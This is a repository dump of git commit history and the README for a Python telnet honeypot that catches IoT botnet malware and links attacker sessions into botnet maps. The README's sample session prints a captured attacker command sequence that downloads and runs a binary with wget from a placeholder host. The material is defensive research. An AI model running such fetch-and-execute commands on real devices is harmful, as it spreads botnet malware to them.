Date:   Sun Apr 16 06:27:43 2017 +0200

    Basci new frontend ready

commit e331c7e15d9d3d3a5d0fdc488d37139bdcd9f310
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Apr 16 06:14:16 2017 +0200

    New frontend

commit eb90810f75801db22eea129c6436ee3863b09b79
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Apr 16 06:14:03 2017 +0200

    New backend

commit bf0cfbf1b21cb508a92c333dcb32bfedd78ab179
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Apr 15 04:28:59 2017 +0200

    Forgot ot remove config.py from ignores

commit e4a25be432080410bec73afc78d59c52d118c8c6
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Apr 15 04:25:00 2017 +0200

    Add option to NOT save samples gathared

commit 77c4400c268d383ccfd196e5d0c077c5cd017f4d
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Apr 15 04:13:47 2017 +0200

    Do not save file at client, drop tftp because it does not work anyway

commit 86969a30d5fa2e95f031606e3c26fd851b636dde
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Apr 15 04:02:29 2017 +0200

    Rework client/server arch

commit 4cc89af93778ebc0762ede3536c19bf4fd22ebf2
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 13 05:21:48 2017 +0200

    Add some doku, sample config.py for local mode

commit 793f93173d1fd248abf2391f8386cf471eda3976
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 13 05:09:30 2017 +0200

    Refactor Client/server Arch - local running

commit a9e0c595086a8b33ddea243ec0080c5ff3dc4e39
Author: Phype <phypemobile@gmail.com>
Date:   Thu Apr 13 01:54:12 2017 +0200

    Fill template

commit 63759b2763920b450bbc86c02b141279b78fe4d2
Author: Phype <phypemobile@gmail.com>
Date:   Thu Apr 13 01:51:00 2017 +0200

    Create LICENSE

commit 5bb4935da71e6ba404ff3abefa310ef540da04d7
Author: Phype <phypemobile@gmail.com>
Date:   Sat Mar 25 22:26:08 2017 +0100

    Update cl/srv install

commit 8dc039aaf949fc7d1095d8fa61518c2437dfde6c
Author: Phype <phypemobile@gmail.com>
Date:   Sat Mar 25 22:23:18 2017 +0100

    Add tftpy as dependency

commit 1d93648cbace7ad887a270cfffc3a50e0b4ad835
Author: Phype <phypemobile@gmail.com>
Date:   Sat Mar 25 22:22:05 2017 +0100

    Ref to client-server branch

commit f40c152c43a6efe21d82ff967894c7318f781f36
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Mar 25 22:05:07 2017 +0100

    Reset Master to commit 5caca711a12efb1b9c05ef1ff8eec68489a1e990

commit 2b0ad470a36d0ead213fbb86b2803ee2994680be
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Jan 11 12:17:46 2017 +0100

    Fix broken graph display

commit 0317d44ad56aed6af0c0656c1ac49ee9d8ab6ba7
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:47:41 2017 +0100

    Better clamp sample list

commit b7ffaaa03b9aa9218f3cc2572673f3f3dbc9340e
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:41:18 2017 +0100

    Basic stats on frontend

commit 50cf3d5051cde677ebbbb1b04541f4c2d1f46cce
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:37:29 2017 +0100

    Re-introduce basic stats

commit e5641fa7e42a0c9dbf39afb33a298566b7370dc0
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:32:14 2017 +0100

    Re-add back to index link

commit cd077fdf38becb6264256f2378c92a23be8d9533
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:30:54 2017 +0100

    Just show first sample on detail page

commit 2d267b9f9fbf2998d4456d9d9da83999a3700c3a
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:28:46 2017 +0100

    revert

commit 1257da4d53a38fb0384673b9bb80210fb1652496
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:26:00 2017 +0100

    select other col

commit 77de49622ff7885517e918646608e943ef0c23f5
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:21:48 2017 +0100

    Sample stats limited to latest active samples

commit 44ea91b6018692905400ff4274437168277dc9bc
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 15:55:03 2017 +0100

    api url 2

commit 8c11975704c69ce6c0a444191273e8dbee9d56c2
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 15:45:06 2017 +0100

    api url

commit 855ec081b58d38d217dda93a838426888cb573b8
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 15:42:32 2017 +0100

    Fix detail page

commit 2e904950006a960ea75ec2961ce03443327d1a8c
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 15:04:11 2017 +0100

    Remove last bit from history which is always 0

commit 9a68a38dbc825052b8a00784c094d52728548369
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 14:45:38 2017 +0100

    Backend sample upload

commit 3092fae4783f67b2e86c2a377f70857e83d9dbc3
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 11:46:17 2017 +0100

    new url

commit 76b43ff98cef446b40b4248deb62debc5b981c8e
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 11:36:07 2017 +0100

    epic fail, bad column size

commit 4e140f4d255bd1d6398a8bb84cb972a7a38f86cf
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 11:08:44 2017 +0100

    Fix date, hopefully

commit 731829c95eefbb0acb2e61db1134e38d1b67a4a0
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 10:59:25 2017 +0100

    Make frontend work with new backend api

commit 3e2c1c821dc2ac63b299573be400b767aed3f6ff
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 10:19:29 2017 +0100

    re-implemented old backend

commit dbcc508c29ea1528bdd9b732d167098a29d4422c
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 04:20:26 2017 +0100

    Retry every time when uploading to backend

commit 55c14d0edd75f1d9babc507239e8fdf39ee0cc40
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 7 05:49:53 2017 +0100

    meeeeh

commit 8f4c065a2f508ecbd566ef577e3ccee9c566e95b
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 7 03:22:13 2017 +0100

    More db crap

commit ed8e8dd9f02a51e3cded6d3b3bfb3bbaac581f3c
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 7 03:08:30 2017 +0100

    sqlite

commit 2e2813787f39bb12f0bf4fa7d1aacad4c3186c4c
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 7 02:40:09 2017 +0100

    Forgot one ...

commit 336ba0ac58fa5812c7b34277d4986b7aec1a409f
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 7 02:38:18 2017 +0100

    Get rid of "Mysql server has gone away"

commit 559309b1adeffbd68ec9f69bfba22167cb29678d
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 7 01:25:04 2017 +0100

    Client/Server test, now using flask, not djanog

commit f1a6480656a9d822c2cfc17cf101d8b726f914e2
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 18:28:13 2017 +0100

    Django backend test

commit 5caca711a12efb1b9c05ef1ff8eec68489a1e990
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 05:54:18 2017 +0100

    remove dn

commit d564e0f74814c5720313e7eda78d37400baf8e9a
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 05:49:34 2017 +0100

    Demo url

commit d02bc9744ae4261dc7bc671995fd90ab4c529539
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 05:46:53 2017 +0100

    Fix Date display

commit 59e7da2fc05f0e42f368012a08e3a60057f9595a
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 05:24:38 2017 +0100

    ported php to mysql

commit 25ea2d70ab806b0765f07d20331f08eb1ba1ace6
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 03:57:34 2017 +0100

    todo

commit 1456a55dc28c002f099ac7cfc98ded2466371eab
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 03:50:21 2017 +0100

    Parsing support for nc and ftpget. No dowload support yet.

commit 3af2896db6f5861f212aef541e7449468d358e58
Merge: 215a127 7509b13
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 03:48:39 2017 +0100

    Merge branch 'master' of github.com:Phype/telnet-iot-honeypot

commit 215a12779f36217392529e0e8cf0f1a01623071c
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 03:48:33 2017 +0100

    cleanup

commit 7509b13e35f398ccb5e0fdfb9b3b7f5a22407bce
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 01:54:31 2017 +0000

    fix absolute url

commit bbec1325c4ed77b0e157f910b47a8ebc4d1bcddf
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 1 20:37:16 2017 +0100

    Exception name

commit 80f96d349cb0ca94cd4143b3d4a064e908e970f9
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 1 20:35:38 2017 +0100

    Make conns_urls unique

commit d85fd205c67b7c0792dc40a9e785baabcadb6c92
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 1 20:23:15 2017 +0100

    Make delta in detail page configurable

commit 9ce343d529eacdd4051eb2f5d41d316e818c3f2d
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 31 00:51:41 2016 +0100

    Introducing max session time, download exception handled better

commit 4a81c6b6a631d7c29e686c472ce3e7c004a0fe66
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 31 00:30:10 2016 +0100

    Fix exception logging when client disconnects

commit 30a0dbb89d36177bd2f8947b369f4b496773d36c
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 31 00:20:29 2016 +0100

    Auto upload to vt.com

commit 82f41e438167e32a700b8c08970dce1ede41e471
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Dec 30 23:39:00 2016 +0100

    More cleanup

commit fb448984ce459d81f3064a672254cfdbd07775ee
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Dec 30 22:35:14 2016 +0000

    Some cleanup in frontend

commit 7e404c92243477d2520b2c9110b9fee3c880ed58
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 29 00:21:20 2016 +0000

    vt update script

commit 87f1280fe2cd0e83d7acaf46d843ff746684949a
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 29 00:06:49 2016 +0100

    Tests

commit dc9ab407d2a70da61aa01592badba7596b0e9665
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 29 00:06:31 2016 +0100

    TFTP Support

commit 7a1d5bf1076742726bf6f4360af2aafc399b0d8a
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Dec 28 01:25:35 2016 +0000

    Only show 24h in pie

commit 2a7a1164866a5e0089702b51e3dcc5db3bf25f20
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 27 22:45:11 2016 +0100

    fix absolute url

commit cea657cc1ff446d854d4ede742f2deaeb799a7ed
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 27 22:42:50 2016 +0100

    doku2

commit c15bac4b1e5dde3b6153fb1bc2051bb69c152fbf
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 27 22:40:25 2016 +0100

    Doku

commit 99c85d1dddc6e2ecf0db1dca241e0811b1a90a7e
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 27 22:13:07 2016 +0100

    todo

commit bd5f83d80bfa68c7afd952a4d157fa6b5106921b
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 26 06:44:03 2016 +0100

    Syntax fail

commit c99cc7e819b018e6429118d23b25abf4673a2263
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 26 06:41:42 2016 +0100

    Fix db insert

commit 40ab49c4aa7486a29d4daef42df793520aa86237
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 26 06:37:23 2016 +0100

    Fix length -> len

commit 19622191a3a459bbcfa22704f5883aa00d713b10
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 26 06:14:48 2016 +0100

    Fix Month display

commit e1d2e5c78c2300a71f65f14f7cb3eb7700946e05
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 13 04:11:07 2016 +0100

    Delete js dependencies etc.

commit 446df1b0cccb517bee719253d80b1f9610159d73
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 13 04:07:54 2016 +0100

    Add sample session

commit 9087062583999ec76f7d45c9ff98c1c93bd78447
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 13 04:05:17 2016 +0100

    Add description

commit 3004cd836454ae1dd18a4a522f50f92147564d90
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 13 03:52:16 2016 +0100

    Added detailed stats

commit d5b9b031b5dcc1c3979b294a589970eedfd8e877
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 11 01:56:06 2016 +0100

    Virustotal results into db

commit 91de773396929127031d4ab45cd8090bf47401c0
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 8 17:19:29 2016 +0100

    Save and display file length

commit a0494d3dfd895934d3ab9e5ecf9fe215cf9f622e
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 8 16:29:58 2016 +0100

    Fix connection history display

commit 198af01efb297140fcdede04ccb09fa9c446ecda
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 8 03:26:31 2016 +0100

    Anonymize IP's

commit f2910964c41aa6efd68ee9dd6926cde0a60ad203
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 8 02:49:08 2016 +0100

    Last seen date on stats

commit 05291349ed6b46d39def01c0ceda5b7e5e9b4094
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 8 02:26:40 2016 +0100

    Persistent chart colors

commit 89cb542ef3e9b19cf5fb0c4f98822802b45d648c
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 8 02:15:42 2016 +0100

    Do not forget urls which are alady known for statistics

commit ebc6d65a7759dcd08c0c90c2b5b705bb309a63c9
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Dec 7 22:56:11 2016 +0100

    Add github link to html

commit 236709e61f41cc002865b99ba658a335ff582987
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Dec 7 22:51:49 2016 +0100

    Initial commit
======================: FILES :======================
======================: README CONTENT :======================
## Disclaimer

This project neither supported or in development anymore. It is based on python2 which has reached its EOL in 2020 and uses dependencies which are getting harder to install over time. Use at your own risk! 

# Telnet IoT honeypot

'Python telnet honeypot for catching botnet binaries'

This project implements a python telnet server trying to act
as a honeypot for IoT Malware which spreads over horribly
insecure default passwords on telnet servers on the internet.

The honeypot works by emulating a shell enviroment, just like 
cowrie (https://github.com/micheloosterhof/cowrie).
The aim of this project is primarily to automatically analyse
Botnet connections and "map" Botnets by linking diffrent
connections and even Networks together.

## Architecture

The application has a client/server architecture,
with a client (the actual honeypot) accepting telnet connections
and a server which receives information about connections and
does the analysis.

The backend server exposes a HTTP interface which is used
to access to frontend as well as by the clients to push new
Connection information to the backend.

## Automatic analysis

The Backend uses 2 diffrent mechanisms to automatically link
connections:

### Networks

Networks are discovered Botnets. A network is the set of all linked
connections, urls and samples. Urls and samples
are linked when they are used in a connection. Two connections are linked
when both connections are recieved by the same honeypot client
(mutliple clients are supported!) and use the same credentials in a short
period of time (defautl 2 minutes) or come from the same IP address.

### Malware

Multiple networks are identified to use the same type of malware
if the text entered during sessions of the networks aro mostly the
same. This comparison is done using sort of "hash"-function which
basically translates a session (or connection) into a sequence
of words and then maps each word to a single byte so this resulting
sequence of bytes can be easily searched.

# Running

The application has a config file named config.py.
Samples are included for local and client/server deployments.

## Configuration

The backend requires a SQL-database (default sqlite) which is initialized
at first run. Before the first run you should generate a admin account
which is used to generate more users. The admin account can also directly
used by a client to post connections. When more than one honeypots shall be
connected, creating multiple users is recommended.

	bash create_config.sh

Both client and backend will read the files `config.yaml` and `config.dist.yaml`
to read configuration parameters. The `config.dist.yaml` file includes
default values for all but admin user credentials and these parameters
are overwirtten by entries in the `config.yaml` file.

## Running the Server

	python backend.py

## Running the Client

This project contains an own honeypot, however because of the client-server architecture,
other honeypot can be used as well.

### Using the built-in honeypot

	python honeypot.py

The client cannot be started without the server running. To use a diffrent configuration
for the client you can use the `-c` switch like this:

	python honeypot.py -c myconfig.yaml

If you only want to check the honeypot functionality,
you can start the client in interactive mode:

	python honeypot shell

### Using cowrie

I wrote an output plugin for cowrie, which has much more features than the built in honeypot.
If you want to use cowrie instead, checkout my fork which includes the output module here:
https://github.com/Phype/cowrie .

## Opening the frontend

After the server is started, open `http://127.0.0.1/` in your favorite browser.

## Sample Connection

	enable
	shell
	sh
	cat /proc/mounts; /bin/busybox PEGOK
	cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
	nc; wget; /bin/busybox PEGOK
	(dd bs=52 count=1 if=.s || cat .s)
	/bin/busybox PEGOK
	rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit

## Images

![Screenshot 1](images/screen1.png)

![Screenshot 2](images/screen2.png)

![Screenshot 3](images/screen3.png)
====================== GIT HISTORY: ======================
5d32829 HEAD@{0}: clone: from https://github.com/Phype/telnet-iot-honeypot
commit 5d32829a36b5bcd369e47d9225f7a88dfdcfe490
Author: Philipp Jeitner <3951813+Phype@users.noreply.github.com>
Date:   Thu Apr 21 11:47:01 2022 +0300

    Update README.md

commit a733bfe601cd2802f0b85c8771f1dff497ddafd7
Author: Philipp Jeitner <3951813+Phype@users.noreply.github.com>
Date:   Thu Apr 21 11:46:25 2022 +0300

    Update README.md
    
    Add deprecation notice.

commit f1d4b75245d72990d339668f37a1670fc85c0c9b
Merge: 986ec09 a7c5452
Author: Phype <phypemobile@gmail.com>
Date:   Wed Mar 10 12:07:46 2021 +0100

    Merge pull request #30 from armanirodriguez/master
    
    Fixed backend crashing

commit a7c5452a1e084965aca121c47acf2baadd0a59a6
Author: armanirodriguez <armanilrodriguez@gmail.com>
Date:   Tue Mar 9 16:05:26 2021 -0500

    added threading to flask server

commit 986ec09933b90db55dcb76f20572f2dd27a72790
Merge: 4b68129 aef823f
Author: Phype <phypemobile@gmail.com>
Date:   Wed Jul 22 13:44:30 2020 +0200

    Merge pull request #29 from verovaleros/master
    
    Update connection.html to fix typo

commit aef823f20c4d88cf3986d53ab620dc1d67ba12bb
Merge: 4b68129 d909c9e
Author: Veronica Valeros <vero.valeros@gmail.com>
Date:   Sat Jul 18 19:14:40 2020 +0200

    Merge pull request #1 from verovaleros/verovaleros-patch-1
    
    Update connection.html to fix typo

commit d909c9e78a066e392a8e14bec3e992342cf4ba64
Author: Veronica Valeros <vero.valeros@gmail.com>
Date:   Sat Jul 18 19:13:59 2020 +0200

    Update connection.html
    
    Fixed typo in line 54 ( > gathered)

commit 4b68129d1440d7a81c80de865175c8d8afa31e74
Merge: 22fba98 fbd4d63
Author: Phype <phypemobile@gmail.com>
Date:   Tue Oct 29 15:06:46 2019 +0100

    Merge pull request #26 from xermicus/add-docker-deployment
    
    add Dockerfile and setup script for docker-compose

commit fbd4d630d18220132a749c22aef1541c2b555afe
Author: xermicus <bigcyrill@hotmail.com>
Date:   Thu Oct 3 09:54:39 2019 +0200

    add Dockerfile and setup script for docker-compose

commit 22fba98d03cb8b517180e58ee372ef5a69a96ae4
Merge: d423784 ed1843e
Author: Phype <phypemobile@gmail.com>
Date:   Wed Sep 4 14:49:13 2019 +0200

    Merge pull request #25 from Cih2001/master
    
    Bug fix

commit ed1843ea9df2d4ac8cd11051c429e7b21c371b22
Author: Hamidreza Ebtehaj <hamidreza.ebtehaj@gmail.com>
Date:   Fri Aug 9 16:24:46 2019 +0200

    Fixed a bug that causes an endless loop when we continue without adding pos.

commit d423784e848682766a1fc9e465683d8721ab7a23
Author: Phype <you@example.com>
Date:   Sat Apr 20 08:02:37 2019 -0400

    some fixes for testing

commit 55171c891fec3c3a21d6cbe51c2d4d70bc07bf29
Author: Phype <you@example.com>
Date:   Fri Apr 19 13:06:50 2019 -0400

    Fix frontent when behind an https proxy

commit e84ec3f9265d640244f6d84a23df19d3bb18123f
Author: Your Name <you@example.com>
Date:   Fri Apr 19 13:02:03 2019 -0400

    Fix error on push without login (happens only with cowrie)

commit 9dcc48068a00cef37bff20219b873e681a2d8181
Merge: 0c489dc c9901d7
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Mar 9 18:27:47 2019 +0100

    Merge branch 'master' of github.com:Phype/telnet-iot-honeypot

commit 0c489dc5d18ff4dbf906753da22d7ff7429e3922
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Mar 9 18:27:04 2019 +0100

    Make ugly hack even uglier :S

commit c9901d7aad998bec8419ada12494bdb168e6d317
Author: Phype <philipp.jeitner@sit.tu-darmstadt.de>
Date:   Sat Mar 9 16:47:00 2019 +0100

    Update README.md

commit edd4cf918f5326a282320b0db6363b363fc36bce
Author: Philipp Jeitner <philipp.jeitner@sit.tu-darmstadt.de>
Date:   Fri Mar 8 18:57:37 2019 +0100

    Fix dependencies for eventlet (maybe?!)

commit 1a5b4d785bb6fe0c24e5fc3dd2300346e94064aa
Author: Phype <p.jeitner@gmail.com>
Date:   Fri Mar 8 17:56:35 2019 +0000

    Exception debugging

commit 09c7993b0eafa621b5409e6014035542c49bbf9b
Author: Philipp Jeitner <philipp.jeitner@sit.tu-darmstadt.de>
Date:   Fri Mar 8 18:40:11 2019 +0100

    try to fix sqlite with slow machines

commit ef73755e81724ef39d66d5058c1353baa0475ab9
Author: Philipp Jeitner <philipp.jeitner@sit.tu-darmstadt.de>
Date:   Fri Mar 8 18:05:18 2019 +0100

    Fix issue #19

commit 35d24aa6d614214513c8c7405d712f6bf7fb7108
Author: Phype <philipp.jeitner@sit.tu-darmstadt.de>
Date:   Tue Mar 5 23:20:28 2019 +0100

    Delete TODO.md

commit 002c6dfbd2833401b1c478eae3420e475bcc2c72
Author: Philipp Jeitner <philipp.jeitner@sit.tu-darmstadt.de>
Date:   Tue Mar 5 22:36:12 2019 +0100

    updated github, many new features!

commit 6720ca750555a392296ee34290c70e6ec6375e1c
Merge: cf43e46 47cff9d
Author: Phype <phypemobile@gmail.com>
Date:   Tue Mar 5 21:37:11 2019 +0100

    Merge pull request #16 from ameygat/patch-1
    
    Change for Removing Error local variable _BACKEND referenced before a…

commit 47cff9d1a15f8d97264683a1400d767901806489
Author: Amey Gat <ameygat@users.noreply.github.com>
Date:   Fri Apr 20 18:30:28 2018 +0530

    Change for Removing Error local variable _BACKEND referenced before assignment
    
    Normal Execution Getting Error:
    ```
      File "/home/a/honeypots/telnet-iot-honeypot/honeypot/sampledb_client.py", line 14, in get_backend
        if _BACKEND:
    UnboundLocalError: local variable '_BACKEND' referenced before assignment
    ```
    So this Fix.

commit cf43e469ff86e0cb102a5eea4d9eef1dfb1ab6f2
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 12 21:07:26 2018 +0100

    remove func

commit ff77f18446e9b21429c08763dd45c631aa109f55
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Jan 11 17:20:37 2018 +0100

    cleanup

commit 00c3615ef73639d4f1d626916fe1b97c04204384
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 7 03:57:00 2018 +0100

    Rework honeypot shell struture. Add TFTP support

commit 6eb46876c71c8af2ef7a9a92525d52d7a9f0541b
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 6 20:52:02 2018 +0100

    TFTP test

commit 0ae07cff31c84b0563bb6cd997992f053d140e40
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 6 07:14:31 2018 +0100

    Fix timeout

commit 2bfb3aed5c07259393ab5f0c2229bc0bfc73a528
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 6 07:11:43 2018 +0100

    Add timeout

commit da7a5a7d0940a218f75973867174d8bae0fc6ba7
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 6 06:58:07 2018 +0100

    Parse Hajime stub downloader, dl real stage2 binary

commit fd6701ff3aedb8426a8d665c69f41a85c25baf55
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 6 06:25:03 2018 +0100

    Write-up of mirai/hajime commands used

commit 5d22d852e951018044ac4a82b19bb1576da41180
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 6 06:24:39 2018 +0100

    Fix case when url lookup does ignore asn resolution config

commit 592d245f526e519afd3e46ca8e3b251ee2edbdd1
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 2 06:44:33 2018 +0100

    Fix redirect from [only parsing]

commit ed32f8f905c07bb126b2d3990d54a34ef6f1a86a
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 2 06:37:00 2018 +0100

    Add fancy graph for connhash analysis, option to disable ASN lookup

commit 8426c2c42ca1d7f68b01e67fba4190c1e3521cf6
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 2 06:35:45 2018 +0100

    Fix trailing whitespace with redirects

commit 983394a9fb894c6d3554ba26f40570d5c959e8b4
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 31 07:14:56 2017 +0100

    Fix backend error when connections includes same url twice

commit 048e2471649a7e4e4c64925ec48f357a70fca28e
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 31 07:14:26 2017 +0100

    Change wget help screen to busybox one

commit 632e9a593a5749ad03e443760db8ed08b99aeb07
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 26 04:17:52 2017 +0100

    Update installation instructions

commit c911f1c6b85768e9c69990e44a024a186138d4be
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 26 04:00:43 2017 +0100

    Update requirements

commit af75e963d5da7c0528191f1c962f553cc6c81811
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 26 04:00:10 2017 +0100

    Serve static files for development

commit c7961943af31bf581b795971f34b12a9137b3d71
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 21:41:05 2017 +0100

    Ability to re-run a logfile

commit bdd23fe93f87bf843093f40688863be31fba0094
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 21:26:54 2017 +0100

    Detect deleted files as samples

commit 0676e2633413c9b75635d4883e61c2e4bb7d5701
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 21:22:55 2017 +0100

    Fix appending redirect

commit 5d262bc37281e5d4ae24ea61d3aee6a0a504c799
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 06:41:16 2017 +0100

    log ignored files

commit bc8b8c462b849d3950e30fe2e9baea943517ef3c
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 06:28:46 2017 +0100

    Fix broken redirects

commit a6875df93e386376646889ea776b2fa40b468428
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 05:02:51 2017 +0100

    Make it posible to run the honeypot standalone, logging to file only

commit 3215a97bf8f777257957ba20fb1ee79996f24d97
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 25 04:55:57 2017 +0100

    Switch representation of session text from string to event stream

commit 2dffa0536c1df4dfbbc01df1af3382c004701e44
Merge: 932bb09 b0cbc33
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Dec 20 23:26:13 2017 +0100

    Merge branch 'master' of github.com:phype/telnet-iot-honeypot

commit 932bb090e21c2fe8e21cd5e3e0407e707e812f16
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Dec 20 23:26:02 2017 +0100

    Add vagrant config

commit b0cbc331bfe3324f3ced676d15abf957944a8d94
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 07:03:31 2017 +0100

    Dont output anything when wget switch -O is used

commit 40406f4131e6c692e3efcb4af09627ef737ba7ee
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 06:54:36 2017 +0100

    Add virustototal update switch

commit 3cf5199dbbb0838862d9b87a9bdb03110fc7de3c
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 06:05:45 2017 +0100

    Fix length of users.password to 64 chars ...

commit ca6704e4639556a8e9f987daf656a2ca55f9926d
Author: Philipp Jeitner <p.jeitner@gmail.com>
